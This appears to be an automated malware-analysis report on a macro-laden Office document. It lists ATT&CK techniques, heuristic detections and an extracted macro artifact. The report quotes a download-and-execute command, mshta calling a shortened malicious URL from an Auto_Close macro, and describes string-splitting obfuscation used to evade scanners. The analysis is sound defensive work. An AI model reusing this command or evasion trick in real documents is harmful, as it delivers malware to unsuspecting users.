MALICIOUS
220
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1218.005 System Binary Proxy Execution: Mshta
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an Auto_Close subroutine that executes a command using the Shell() function. This function is used to call 'mshta "https://j.mp/jhay2assox"', which is a common technique for downloading and executing malicious content. The use of split string literals to reassemble 'mshta' indicates obfuscation, further supporting malicious intent.
Heuristics 5
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas7a7c40620bd4093612a7ec965c9b0fc213ab2cf2f8f1b340b6fbe7dff0658f1e |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 122 bytes |
Open this report in the interactive analyzer, or submit your own file for analysis.